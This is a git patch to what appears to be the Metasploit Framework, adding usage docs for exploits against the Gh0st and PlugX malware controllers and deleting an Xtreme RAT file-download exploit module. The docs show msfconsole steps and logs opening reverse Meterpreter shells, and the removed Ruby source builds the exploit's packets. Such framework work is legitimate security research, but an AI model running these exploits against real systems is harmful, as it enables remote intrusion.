From d05c401866c811e0508d8a3ebdb18b89872a4fd5 Mon Sep 17 00:00:00 2001
From: h00die
Date: Mon, 4 Sep 2017 20:57:23 -0400
Subject: [PATCH] modules cleanup and add docs
---
 .../modules/exploit/windows/misc/gh0st.md | 42 ++++++
 .../modules/exploit/windows/misc/plugx.md | 42 ++++++
 modules/exploits/windows/misc/gh0st.rb | 3 +-
 modules/exploits/windows/misc/plugx.rb | 2 +-
 modules/exploits/windows/misc/xtreme.rb | 124 ------------------
 5 files changed, 86 insertions(+), 127 deletions(-)
 create mode 100644 documentation/modules/exploit/windows/misc/gh0st.md
 create mode 100644 documentation/modules/exploit/windows/misc/plugx.md
 delete mode 100644 modules/exploits/windows/misc/xtreme.rb
diff --git a/documentation/modules/exploit/windows/misc/gh0st.md b/documentation/modules/exploit/windows/misc/gh0st.md
new file mode 100644
index 0000000000..5ae7c251e4
--- /dev/null
+++ b/documentation/modules/exploit/windows/misc/gh0st.md
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+ This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
+ This vulnerability can allow remote code execution in the context of the user who ran it.
+
+ A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)
+
+## Verification Steps
+
+ 1. Run the application
+ 2. Start msfconsole
+ 3. Do: `use exploit/windows/misc/gh0st`
+ 4. Do: `set rhost [ip]`
+ 5. Do: `exploit`
+ 6. Get a shell
+
+## Options
+
+ **MAGIC**
+
+ This is the 5 character magic used by the server. The default is `Gh0st`
+
+## Scenarios
+
+### Windows XP SP3 with gh0st 3.6
+
+```
+msf > use exploit/windows/misc/gh0st
+msf exploit(gh0st) > set rhost 192.168.2.108
+rhost => 192.168.2.108
+msf exploit(gh0st) > exploit
+
+[*] Started reverse TCP handler on 1.2.3.4:4444
+[*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
+[*] 1.2.3.1.108:80 - Spraying heap...
+[*] 1.2.3.1:80 - Trying command 103...
+[*] Sending stage (956991 bytes) to 1.2.3.1
+[*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
+[*] 1.2.3.1:80 - Server closed connection
+
+meterpreter >
+```
diff --git a/documentation/modules/exploit/windows/misc/plugx.md b/documentation/modules/exploit/windows/misc/plugx.md
new file mode 100644
index 0000000000..63640995f3
--- /dev/null
+++ b/documentation/modules/exploit/windows/misc/plugx.md
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+ This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.
+ This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
+
+ A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)
+
+## Verification
+
+ 1. Run the application
+ 2. Start msfconsole
+ 3. Do: `use exploit/windows/misc/plugx`
+ 4. Do: `set rhost [ip]`
+ 5. Do: `set target [target]`
+ 6. Do: `exploit`
+ 7. Click OK for the "PeDecodePacket" pop-up on the target
+ 8. Get a shell
+
+## Scenarios
+
+### Windows XP SP3 with PlugX type 1
+
+```
+msf > use exploit/windows/misc/plugx
+msf exploit(plugx) > set rhost 1.2.3.4
+rhost => 1.2.3.4
+msf exploit(plugx) > set target 1
+target => 1
+msf exploit(plugx) > set verbose true
+verbose => true
+msf exploit(plugx) > exploit
+
+[*] Started reverse TCP handler on 1.2.3.99:4444
+[*] 1.2.3.4:13579 - Trying target PlugX Type I...
+[*] 1.2.3.4:13579 - waiting for response
+[*] Sending stage (956991 bytes) to 1.2.3.4
+[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400
+[*] 1.2.3.4:13579 - Server closed connection
+
+meterpreter > getuid
+Server username: WINXP\user
+```
diff --git a/modules/exploits/windows/misc/gh0st.rb b/modules/exploits/windows/misc/gh0st.rb
index 1c5e29d52a..f4a8ff1734 100644
--- a/modules/exploits/windows/misc/gh0st.rb
+++ b/modules/exploits/windows/misc/gh0st.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
 register_options(
 [
- OptString.new('MAGIC', [true, 'the 5 char magic used by the server', 'Gh0st']),
+ OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
 Opt::RPORT(80)
 ]
 )
@@ -82,7 +82,6 @@ class MetasploitModule < Msf::Exploit::Remote
 print_status('Packet decompress failure')
 return false
 end
- # print_status(msg.ord.to_s)
 return true
 end
diff --git a/modules/exploits/windows/misc/plugx.rb b/modules/exploits/windows/misc/plugx.rb
index c21c7c93e8..200f732c57 100644
--- a/modules/exploits/windows/misc/plugx.rb
+++ b/modules/exploits/windows/misc/plugx.rb
@@ -162,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
 connect
 sock.put(pkt)
- print_status('waiting for response')
+ print_status('Waiting for response')
 validate_response(sock.get_once)
 disconnect
diff --git a/modules/exploits/windows/misc/xtreme.rb b/modules/exploits/windows/misc/xtreme.rb
deleted file mode 100644
index edae9318a0..0000000000
--- a/modules/exploits/windows/misc/xtreme.rb
+++ /dev/null
@@ -1,124 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'zlib'
-
-class MetasploitModule < Msf::Exploit::Remote
- Rank = NormalRanking
- include Msf::Exploit::Remote::Tcp
- include Msf::Auxiliary::Report
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Xtreme Rat Controller Remote File Download Exploit',
- 'Description' => %q{
- This module exploits an arbitrary file download vulnerability in the Xtreme C&C server
- },
- 'Author' => 'Professor Plum',
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- ],
- 'Platform' => 'win',
- 'DisclosureDate' => 'Jul 27 2017',
- 'Targets' =>
- [
- ['Xtreme RAT 3.6', { 'Ver' => '3.6' }],
- ['Xtreme RAT 3.7', { 'Ver' => '3.7' }]
- ],
- 'Privileged' => false,
- 'DefaultTarget' => 1))
-
- register_options(
- [
- Opt::RPORT(80),
- OptString.new('TARGETFILE', [true, 'Target file to download', 'user.info'])
- ]
- )
- end
-
- @delm = "\xc2\x00\xaa\x00\xc2\x00\xaa\x00\xc2\x00\xaa\x00#\x00#\x00#\x00\xe2\x00\" a\x01\xe2\x00\" a\x01\xe2\x00\" a\x01".force_encoding('utf-16le')
- @password = ''
- @conid = ''
-
- def validate(b)
- if b != "X\r\n"
- print_status(b.inspect)
- return false
- end
- true
- end
-
- def check
- connect
- sock.put("myversion|#{target['Ver']}\r\n")
- if validate(sock.recv(3))
- return Exploit::CheckCode::Appears
- end
- Exploit::CheckCode::Safe
- end
-
- def make_string(cmd, msg)
- pp = (cmd + @delm + msg)
- pack = Zlib::Deflate.deflate(pp)
- return @password + [pack.size, 0].pack('